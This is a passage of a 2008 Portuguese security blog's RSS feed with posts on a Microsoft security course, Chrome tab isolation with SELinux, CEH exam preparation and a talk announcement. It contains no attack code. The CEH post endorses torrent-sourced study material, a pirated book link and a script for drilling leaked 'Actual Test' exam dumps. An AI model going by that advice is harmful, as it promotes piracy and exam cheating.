			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/09/26/informacoes-cissp/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Academia Microsoft TechNet de Segurança da Informação</title>
		<link>http://ulissescastro.wordpress.com/2008/09/23/academia-microsoft-technet-de-seguranca-da-informacao/</link>
		<comments>http://ulissescastro.wordpress.com/2008/09/23/academia-microsoft-technet-de-seguranca-da-informacao/#comments</comments>
		<pubDate>Tue, 23 Sep 2008 03:41:36 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>
		<category><![CDATA[Certification]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=76</guid>
		<description><![CDATA[Passei! :)
Hahaha putz, caramba ta virando blog de certificação :(
Calma que logo logo vou dar um jeito nisso. :-)
Para quem não sabe/conhece a Microsoft disponibiliza à bastante tempo alguns cursos pela internet de graça, um deles que me chamou atenção foi o de Segurança (novidade, né?).
No início achei meio bobo, com alguns conceitos bem fraquinhos, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=76&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Passei! :)</p>
<p>Hahaha putz, caramba ta virando blog de certificação :(</p>
<p>Calma que logo logo vou dar um jeito nisso. :-)</p>
<p>Para quem não sabe/conhece a Microsoft disponibiliza à bastante tempo alguns cursos pela internet de graça, um deles que me chamou atenção foi o de Segurança (novidade, né?).</p>
<p>No início achei meio bobo, com alguns conceitos bem fraquinhos, mas depois começou a ficar bom e me interessei pelo desafio de ir até o final, o curso não é RECENTE inclusive já é bem velinho, mas o material é excelente.</p>
<p>Meu contato com a norma <strong>NBR ISO/IEC 17799:2005</strong> só havia acontecido quando li o <a href="http://www.linuxmall.com.br/index.php?product_id=4031" target="_blank">livro</a> que meu amigo César Domingos que escreveu com mais alguns feras em segurança, livro que relaciona a norma BS7799 com o Linux e como podemos &#8220;normatizá-lo&#8221;.</p>
<p>AAAh! Não posso esquecer também quando assisti um curso com meu brother <strong>Ub3r l33t h4xor</strong> (brincadeiras à parte), <a href="http://y2h4ck.wordpress.com/" target="_blank">Anderson Tamborim</a> que em sua aula à todo momento fazia relação entre a norma, os pilares da segurança da informação e técnicas de intrusão. (faz tempo mas eu lembro! :))</p>
<p>Voltando pro foco (como dizia o Caio). O que eu mais gostei do curso de Segurança da Informação da Academia Microsoft é pela forma que foram aborados todos os tópicos, difícilmente (salve os primeiros módulos) no material você encontra algo técnico ou falando de algum produto Microsoft. O curso explica sobre conceitos de segurança de informação sendo que a segunda parte do curso fala somente sobre a norma <strong>NBR ISO/IEC 17799:2005</strong>.</p>
<p>Abaixo fiz um Ctrl+C / Ctrl+V dos módulos do curso e seus objetivos, provavelmente vai ficar tudo quebrado no blog mas beleza, é para constar e matar a curiosidade do pessoal que se interessar.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p><em>Academia Microsoft Technet de Segurança da Informação</em></p>
<p><em>Estágio Básico</em></p>
<p><em>Módulo 1 &#8211; Introdução à Segurança da Informação<br />
Objetivos:<br />
• Conhecer os conceitos básicos que fundamentam os estudos sobre segurança da informação;<br />
• Conhecer as diferentes categorias de ativos existentes em uma empresa;<br />
• Compreender o conceito de pontos fracos para identificar as possíveis vulnerabilidades e as ameaças existentes nos ativos;<br />
• Interpretar a classificação proposta das possíveis ameaças encontradas nos diferentes processos da empresa;<br />
• Revisar os conceitos de integridade, confidencialidade e disponibilidade da informação;<br />
• Conhecer o conceito de risco e sua implicação no ciclo de segurança das informações da empresa;<br />
• Distinguir a diferença entre aplicar ou não medidas de segurança nos diferentes aspectos de nossa empresa;<br />
• Compreender os conceitos básicos de análise de riscos e política de segurança, dois pontos muito importantes para definir as ações em matéria de segurança aplicáveis às empresas.</em></p>
<p><em><br />
Módulo 2 &#8211; Conceitos de Análise de Risco<br />
Objetivos:<br />
• Conhecer os conceitos referentes à atividade de análise de riscos, para se ter o fundamento que oferece suporte à administração da segurança da informação;<br />
• Identificar os processos de negócios da organização para distinguir os ativos que os suportam, considerando toda a infra-estrutura tecnológica, organizacional e humana;<br />
• Descrever as ameaças potenciais que podem causar incidentes de segurança;<br />
• Determinar as vulnerabilidades presentes nos ativos para que sejam devidamente corrigidas.</em></p>
<p><em><br />
Módulo 3 &#8211; A Política de Segurança<br />
Objetivos:<br />
• Conhecer os conceitos básicos de políticas de segurança para poder definir as bases necessárias para sua correta elaboração;<br />
• Identificar o escopo humano, tecnológico e processual no qual se aplicarão essas políticas e, dessa forma, ajudar a cobrir todos os pontos necessários para a segurança da empresa;<br />
• Compreender as exigências básicas e as etapas de produção de uma política de segurança para poder partir de uma base mais sólida para a mesma;<br />
• Definir as diretrizes estratégicas que permitam ilustrar os valores que se deseja definir nas políticas de segurança;<br />
• Conhecer as vantagens da aplicação das políticas de segurança no que diz respeito a seleção de produtos e desenvolvimento de processos.</em></p>
<p><em><br />
Módulo 4 &#8211; Implantação da Segurança e Plano de Segurança<br />
Objetivos:<br />
• Conhecer a importância do plano de implementação de segurança da empresa para que sua execução seja bem-sucedida em nossa organização;<br />
• Reconhecer, através de exemplos, as diferentes ações em matéria de segurança que possam ser tomadas dentro da empresa com a finalidade de ajudar na seleção dessas ações em nossa organização;<br />
• Interpretar como se estrutura o plano de segurança da organização a partir do conhecimento dos pontos básicos que devem ser incluídos;<br />
• Conhecer as informações a serem incluídas no plano de ação e que, independentemente de seu formato, facilitem sua implantação na empresa.</em></p>
<p><em><br />
Estágio Graduação</em></p>
<p><em>Módulo 5 &#8211; Entendendo e implementando a Norma ABNT NBR ISO/IEC 17799:2005<br />
Objetivos:<br />
• Entender os padrões empregados para a gestão da segurança da informação;<br />
• Entender a evolução destes padrões;<br />
• Descrever os controles contidos na norma ABNT NBR ISO/IEC 17799:2005;<br />
• Conceituar cada controle da norma;<br />
• Através de um estudo de caso, implementar a norma em uma empresa.</em></p>
<p><em><br />
Módulo 6 &#8211; Entendendo e implementando a Norma ABNT NBR ISO/IEC 17799:2005<br />
Objetivos:<br />
• Entender o que são os ativos de informação;<br />
• Porque eleger um responsável pelos ativos;<br />
• Como classificar a informação;<br />
• Como rotular a informação de forma segura.</em></p>
<p><em><br />
Módulo 7 &#8211; Entendendo e implementando a Norma ABNT NBR ISO/IEC 17799:2005<br />
Objetivos:<br />
• Estabelecer os procedimentos operacionais que tornam seguro o processamento de recursos da informação;<br />
• Saber a importância da separação de funções e áreas de responsabilidade, bem como de ambientes de desenvolvimento e produção;<br />
• Gerenciar serviços de terceiros;<br />
• Minimizar riscos de falhas em sistemas, através do planejamento de aceitação dos mesmos;<br />
• Proteger softwares contra códigos maliciosos e móveis;<br />
• Implementar estratégias de cópias de segurança;<br />
• Proteger as informações em redes e a infra-estrutura de suporte;<br />
• Proteger e controlar mídias de armazenamento de informações e documentação;<br />
• Gerir a troca de informações e softwares entre organizações.</em></p>
<p><em><br />
Módulo 8 &#8211; Entendendo e implementando a Norma ABNT NBR ISO/IEC 17799:2005<br />
Objetivos:<br />
• Avaliar os critérios, normas e práticas aplicáveis aos processos de aquisição, desenvolvimento e manutenção;<br />
• Estabelecer parâmetros para a tomada de decisão sobre aquisição, desenvolvimento e manutenção de sistemas de informação;<br />
• Classificar e avaliar fornecedores e produtos de software e sistemas de informação;<br />
• Validar os objetivos e efetivar os controles da norma NBR ISO/IEC 17799:2005 nos processos de aquisição, desenvolvimento e manutenção de sistemas de informação.</em></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Pra quem se interessar pelo desafio ou maiores informações, segue o <a href="https://www.technetbrasil.com.br/academia2007/seguranca/Home.aspx" target="_blank">link</a>.</p>
<p>Um abraço!</p>
 Tagged: Announce, Certification, Security <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/76/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/76/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/76/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=76&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/09/23/academia-microsoft-technet-de-seguranca-da-informacao/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Google Chrome + SE Linux = Navegador Blindado</title>
		<link>http://ulissescastro.wordpress.com/2008/09/10/google-chrome-se-linux-navegador-blindado/</link>
		<comments>http://ulissescastro.wordpress.com/2008/09/10/google-chrome-se-linux-navegador-blindado/#comments</comments>
		<pubDate>Wed, 10 Sep 2008 23:51:36 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[SELinux]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=69</guid>
		<description><![CDATA[Tenho lido bastante sobre o novo browser da Google o Chrome, notícias boas outras ruims, alguns bugs de segurança, etc.. nada muito relevante levando em consideração que tudo que a Google lança é versão Beta. (não que isso seja ruim!)
Mas o fato que mais me chamou atenção até agora foi a estratégia da Google ao [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=69&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Tenho lido bastante sobre o novo browser da Google o <a href="http://www.google.com/chrome">Chrome</a>, notícias boas outras ruims, alguns bugs de segurança, etc.. nada muito relevante levando em consideração que tudo que a Google lança é versão Beta. (não que isso seja ruim!)</p>
<p>Mas o fato que mais me chamou atenção até agora foi a estratégia da Google ao criar este novo navegador, acrescentando uma funcionalidade bem diferente em relação aos concorrentes, enquanto alguns fabricantes perdem tempo inventando <strong>&#8220;FIREWALL&#8221;</strong> para navegador com <a href="http://blogs.technet.com/swi/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx">filtro Anti-XSS</a> (<a href="http://www.0x000000.com/?i=634">que em pouco tempo já demonstrou sua fragilidade</a>) o Chrome veio com uma idéia nova e completamente diferente dos outros, com uma arquitetura bem formulada o Chrome promete combater os ataques &#8220;client-side&#8221; mais comuns e e utilizados no mundo.</p>
<p>Hoje quando navegamos e abrimos uma aba esta está diretamente ligada no único processo do navegador em questão, isto nos traz sérios problemas, além da insegurança e fragilidade, uma das coisas que podemos perceber é que quando uma das abas trava <strong>TODO</strong> o navegador <strong>TRAVA/QUEBRA</strong>, e com isso temos que re-abrir-lo.</p>
<p>No Chrome a estratégia aplicada demonstra a seriedade no desenvolvimento em relação à seguraça, cada aba aberta é considerada um <strong>NOVO</strong> processo, talvez a primeira coisa que vem em mente é:</p>
<p><strong>&#8220;</strong><em><strong>Puxa que SUPER!, se uma aba travar não vou perder mais 10 segundos pra re-abrir o navegador, porque somente uma aba irá TRAVAR/QUEBRAR.</strong></em><strong>&#8220;</strong></p>
<p>Affff grande coisa certo? <strong>Errado!</strong> reparem nas possibilidades, se temos processos separados para cada aba logo poderemos utilizar o SE Linux para definir contextos distintos para cada uma delas, o que nos proporciona uma granularidade ABSURDA! Vejamos:</p>
<p>Partindo do ponto que poderíamos ter dois <strong>domínios distintos</strong> para o Chrome e suas abas vamos chamá-los de <strong>chrome_trusted_t</strong> e <strong>chrome_untrusted_t</strong>, e que <strong>chrome_trusted_t</strong> podería ler/escrever em seu home inteiro por exemplo e que o domínio <strong>chrome_untrusted_t</strong> podería somente ler/escrever arquivos do diretório ~/chrome_untrusted.</p>
<p>Com isto já podemos imaginar as possibilidades por exemplo navegar com uma aba nas páginas da intranet da sua empresa tranquilamente e em outra aba você poderia navegar pelos sites mais promíscuos do universo sem ter medo, pois são duas abas <strong>completamente isoladas </strong>e cada uma trancafiada dentro de seu próprio domínio! <span style="text-decoration:line-through;">Será que CSRF, XSS e similares estão com os dias contados?:)</span> Será que <a href="http://www.owasp.org/index.php/Cross-Site_Request_Forgery">CSRF</a>, similares e ataques como <a href="http://betterexplained.com/articles/gmail-contacts-flaw-overview-and-suggestions/">este</a> por exemplo, estão com os dias contados? :(</p>
<p>Nada disto está pronto ainda, são apenas algumas possibilidades aqui apontadas partindo do <strong>FATO</strong> que o Chrome já vem com essa função de abas com processos diferentes implementada!</p>
<p>Alguns GURUS do SE Linux já blogaram sobre essa possibilidde, <a href="http://etbe.coker.com.au/2008/09/02/google-chrome-the-security-implications/" target="_blank">Russel Cocker</a> (debian/redhat), <a href="http://danwalsh.livejournal.com/23118.html" target="_blank">Dan Walsh</a>(redhat), <a href="http://securityblog.org/brindle/2008/09/02/web-browsers-security-and-google-chrome/" target="_blank">Joshua Brindle</a>(tresys) comentaram em seus blogs essas semanas sobre esse assunto e eu não poderia deixar de postar algo tão fantástico.</p>
<p>Vamos aguardar!</p>
<p>Maiores informações sobre o Chrome você pode encontrar <a href="http://feeds.feedburner.com/~r/walterdevlog/~3/380997721/google-chrome">aqui</a> e <a href="http://feeds.feedburner.com/~r/walterdevlog/~3/381688893/google-chrome-novidades">aqui</a> no blog do Waaaaaalter Cruz! :-)</p>
<p>Abraços!</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/69/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/69/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/69/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/69/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/69/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=69&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/09/10/google-chrome-se-linux-navegador-blindado/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Certified Ethical Hacker &#8211; CEH</title>
		<link>http://ulissescastro.wordpress.com/2008/09/10/certified-ethical-hacker-ceh/</link>
		<comments>http://ulissescastro.wordpress.com/2008/09/10/certified-ethical-hacker-ceh/#comments</comments>
		<pubDate>Wed, 10 Sep 2008 04:12:44 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=62</guid>
		<description><![CDATA[Fiquei devendo pra galera maiores informações sobre a certificação CEH e neste post pretendo relatar/fornecer o máximo de informações possíveis sobre esta certificação.
 
ANTES DE COMEÇAR
As dicas deste post não ficam somente no escopo da CEH, como também algumas boas práticas de auto-estudo para certificações.
Quero esclarecer que este post não é uma receita de bolo e [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=62&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Fiquei devendo pra galera maiores informações sobre a certificação CEH e neste post pretendo relatar/fornecer o máximo de informações possíveis sobre esta certificação.</p>
<p> </p>
<p><strong>ANTES DE COMEÇAR</strong></p>
<p>As dicas deste post não ficam somente no escopo da CEH, como também algumas boas práticas de auto-estudo para certificações.</p>
<p>Quero esclarecer que este post não é uma receita de bolo e sim um relato de como procurei material, como estudei e como alcancei os 90% da prova.</p>
<p>Quero deixar bem claro que CEH não é a melhor certificação do mundo, e também não é a mais conceituada (isso depende de cada empresa) e que existem outras boas certificações que seguem a mesma linha de raciocínio que é comprovar de alguma forma conhecimento em testes de intrusão (pentest). ex: GPEN[1], OPST[2], OSCP[3], &#8230;</p>
<p>Outra coisa importante que gostaria de desabafar aqui é que CERTIFICAÇÕES NÃO VALEM NADA e o que importa é a especialidade que a pessoa tem em determinado assunto e também facilidade/velocidade em aprender qualquer coisa rapidamente, mas infelizmente a maioria das empresas, continuam seguindo modelos totalmente obsoletos para contratar pessoas sem métodos para medir seus conhecimentos, por isso infelizmente ter uma certificação AINDA é &#8220;essencial&#8221; para comprovar a capacidade. Com certeza esse desabafo aqui daria mais um post gigante, mas o foco hoje é CEH então bora&#8230;</p>
<p> </p>
<p><strong>PRÉ-REQUISITOS</strong></p>
<p>O pré-requisito da certificação CEH é ter pelo menos 2 anos de experiência comprovada em segurança da informação.</p>
<p>No meu caso, conversei com meu chefe que assinassou uma declaração para comprovar minha experiência e depois do preenchimento de um formulário[4] e o envio ambos por e-mail me retornaram um código que é necessário para completar o formulário do site da VUE[5] para marcar a prova.</p>
<p> </p>
<p><strong>O QUE É?</strong></p>
<p>Certified Ethical Hacker é uma certificação oferecida pela International Council of Electronic Commerce Consultants (EC-Council)[6] e o objetivo da certificação é simples, pensar como um cracker para defender-se contra eles.</p>
<p>E é exatamente isto que a certificação cobra, que você saiba como funcionam as ferramentas e os tipos de ataque para saber se defender.</p>
<p>Maiores informações podem ser encontrada no FAQ[7] sobre a certificação.</p>
<p> </p>
<p><strong>AUTO-ESTUDO</strong></p>
<p>Existe um curso oferecido pela EC-Council e parceiros mas não existe no Brasil, portanto partir para o auto-estudo foi a solução.</p>
<p> </p>
<p><strong>ONDE ENCONTRAR MATERIAL?</strong></p>
<p>Um bom começo é se familiarizar com todas as ferramentas cobradas pela certificação.</p>
<p>Baixei o pdf[8] informativo onde listam todas as ferramentas que serão cobradas, primeiro risquei todas as que eu já conhecia e sobraram somente as desconhecidas, nestas eu encontrei boa parte baixando a distro Backtrack[9] e após estudá-las corri atráz das ferramentas mais obscuras de windows (chatas de encontrar).</p>
<p>Após entender/testar/aprender quase todas as ferramentas, ataquei material para leitura e procurei[10] por um livro chamamdo &#8220;CEH &#8211; Official Certified Ethical Hacker Review Guide&#8221;, é um livro pequeno 250 páginas aproximadamente e o mais bacana é que no próprio livro após cada capítulo existem testes  com questões no mesmo estilo das questões da prova para ir se acostumando. :)</p>
<p>Falando com um amigo disse que havia visto no &#8220;underground&#8221; do mundo torrent materiais pro CEH (Não vou entrar no mérito de como entrar em comunidades &#8220;fechadas&#8221; de torrent, onde encontrar, como conseguir invites e etc) procurei e encontrei excelentes materiais em video-aulas sobre CEH.</p>
<p>E nesta altura você deve estar se perguntando &#8220;Caraca o cara é reduntante!! Testou as ferramentas, leu o livro e agora vai ver o VIDEO!! Afffffff&#8221;</p>
<p>MAAAAAAAAAS, não tem jeito eu sou assim :( quando pego algo que gosto e as vezes até o que não gosto mas sou obrigado, mergulho profundamente e quero saber tuuuudo&#8230; claro que existem aqueles que somente lê o livro ou vê o video e se satisfazem com o conhecimento minúsculo vão fazer a prova e passam, particularmente eu prefiro entender e aprender tudo antes de fazer a prova para passar, seguindo os modismos de musiquinhas toscas[11] &#8220;Cada um no seu quadrado&#8230;&#8221;.</p>
<p> </p>
<p><strong>NTC &#8211; NINJA TEST CENTER</strong></p>
<p>Não podia deixar de citar o NTC!!!!</p>
<p>Um script que desenvolvi para filtar o pdf do Actual Test e transformá-lo em um programa de testes, tá totalmente tosco porque não funciona direito o menu de resultados(porcentagem) e também falta o script para transformar o pdf em texto e fazer os filtros (fiz isto na mão), mas o resto ta legalzinho, eu ia re-escrever todo o código em C pra treinar minhas técnicas ninja em desenvolvimento C mas não consegui tempo para isso e disponibilizo o script e o texto filtrado para CEH para quem quiser baixar, alterar mandar patches, etc..</p>
<p>Antes que venham as perguntas&#8230; Sim, sim esse script funciona com qualquer pdf do Actual Test transformado em texto e filtrado corretamente. (Ah créditos pro meu brother Eduardo (eth0) que me arrumou na época a última versão do Actual Test)</p>
<p>Ah! O objetivo principal desse script era certificar minha esposa que nunca sequer encostou em um computador em qualquer certificação de TI, para provar que certificações não comprovam nada mas ela não quis estudar e eu também não tenho dinheiro pra rasgar e pagar a prova da certificação. :(</p>
<p>Mas se alguém quiser certificar a vovózinha em CCNA ou MCSA ou qualquer outra certificação fique a vontade o script está disponível pra download[12] e é GPL. ;)</p>
<p><span style="text-decoration:line-through;">(créditos nesta parte para o Rafael por disponibilizar o NTC em seu servidor,  valeu Rafa!)</span> O Rafa foi dormir e não hospedou no site dele o NTC por isso disponibilizo no Rapidshare mesmo.</p>
<p>Utilizei ele para me familiarizar com as questões, e comprovar se eu estava preparado e não rasgar as 250 doletas da prova.</p>
<p> </p>
<p><strong>A PROVA</strong></p>
<p>O valor da prova é de USD 250 (doletas) e você tem 4 horas para terminar a prova que consiste em 150 questões todas em inglês e é preciso acertar pelo menos 70% para passar.</p>
<p>Tem um link específico[13] que pode tirar todas as dúvidas em relação a prova.</p>
<p> </p>
<p><strong>CONCLUSÃO</strong></p>
<p>Mesmo achando que essa indústria que se tornou o mercado de certificações um nojo, vejo em certificações um desafio e um estímulo para meus estudos/pesquisas em segurança e também uma diversão.</p>
<p>Espero ter esclarecido as dúvidas da galera que tem bombado no e-mail perguntando sobre a certificação CEH e claro espero ter ajudado as vovózinhas a alcançarem suas certificações MCSA&#8217;s, LPICs, etc, e assim conseguirem um espaço no mercado tão disputado que é TI.</p>
<p> </p>
<p>[]&#8217;s e boa sorte. ;)</p>
<p> </p>
<p><strong>REFERÊNCIAS</strong></p>
<p> </p>
<p>1 &#8211; <a href="http://www.giac.org/certifications/security/GPEN.php" target="_blank">http://www.giac.org/certifications/security/GPEN.php</a></p>
<p>2 &#8211; <a href="http://www.isecom.org/certification/opst.shtml" target="_blank">http://www.isecom.org/certification/opst.shtml</a></p>
<p>3 &#8211; <a href="http://www.offensive-security.com/index.php" target="_blank">http://www.offensive-security.com/index.php</a></p>
<p>4 &#8211; <a href="http://www.eccouncil.org/CEH%20Exam%20EC0-350%20Application%20Form.pdf" target="_blank">http://www.eccouncil.org/CEH%20Exam%20EC0-350%20Application%20Form.pdf</a></p>
<p>5 &#8211; <a href="http://www.vue.com" target="_blank">http://www.vue.com</a></p>
<p>6 &#8211; <a href="http://www.eccouncil.org" target="_blank">http://www.eccouncil.org</a></p>
<p>7 &#8211; <a href="http://www.eccouncil.org/ceh-faq.htm" target="_blank">http://www.eccouncil.org/ceh-faq.htm</a></p>
<p>8 &#8211; <a href="http://www.eccouncil.org/ipdf/EthicalHacker.pdf" target="_blank">http://www.eccouncil.org/ipdf/EthicalHacker.pdf</a></p>
<p>9 &#8211; <a href="http://www.remote-exploit.org/backtrack.html" target="_blank">http://www.remote-exploit.org/backtrack.html</a></p>
<p>10 &#8211; <a href="http://book.pdfchm.com/ceh-official-certified-ethical-hacker-review-guide-exam-312-50-7421/" target="_blank">http://book.pdfchm.com/ceh-official-certified-ethical-hacker-review-guide-exam-312-50-7421/</a></p>
<p>11 &#8211; <a href="http://www.youtube.com/watch?v=Ktgsn_G59os" target="_blank">http://www.youtube.com/watch?v=Ktgsn_G59os</a></p>
<p>12 - <a href="http://rapidshare.com/files/144022110/ntc.tar.gz.html" target="_blank">http://rapidshare.com/files/144022110/ntc.tar.gz.html</a></p>
<p>13 &#8211; <a href="http://www.eccouncil.org/takeexam.htm" target="_blank">http://www.eccouncil.org/takeexam.htm</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/ulissescastro.wordpress.com/62/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/ulissescastro.wordpress.com/62/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/62/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/62/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/62/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=62&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/09/10/certified-ethical-hacker-ceh/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Palestra aprovada! Festival de Software Livre</title>
		<link>http://ulissescastro.wordpress.com/2008/09/03/palestra-aprovada/</link>
		<comments>http://ulissescastro.wordpress.com/2008/09/03/palestra-aprovada/#comments</comments>
		<pubDate>Wed, 03 Sep 2008 22:59:39 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Announce]]></category>
		<category><![CDATA[Conference]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SELinux]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=51</guid>
		<description><![CDATA[É com prazer que informo que estarei como palestrante no Festival de Software Livre em Brasília!
Desta vez falando mais um pouco sobre como endurecer de verdade um servidor Linux e aplicar controle de acesso mandatório (MAC) com Security Enhanced Linux (SE Linux).
A apresentação é uma evolução dos trabalhos, pesquisas e apresentações que faço com SE [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=51&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>É com prazer que informo que estarei como palestrante no <a href="www.festivalsoftwarelivre.org">Festival de Software Livre</a> em Brasília!</p>
<p>Desta vez falando mais um pouco sobre como <strong>endurecer de verdade</strong> um servidor Linux e aplicar controle de acesso mandatório (MAC) com <strong>Security Enhanced Linux</strong> (SE Linux).</p>
<p>A apresentação é uma evolução dos trabalhos, pesquisas e apresentações que faço com SE Linux, e cada vez mais buscando melhores formas de ensinar as pessoas a não seguirem as <strong>&#8220;receitas de bolo do inferno&#8221;</strong> que durante a própria instalação dizem para <strong>desativar</strong> o SE Linux e todo mundo obedece sem saber o porque! :)</p>
<p>E claro se conseguir mais um espaço, pretendo falar sobre teste de vulnerabilidades em aplicações web em especial <strong>SQL Injection</strong> (minha nova paixão).</p>
<p>Não posso deixar de comentar que estarei ao lado dos maiores <strong>&#8220;Rockstarts&#8221;</strong> do Software Livre:</p>
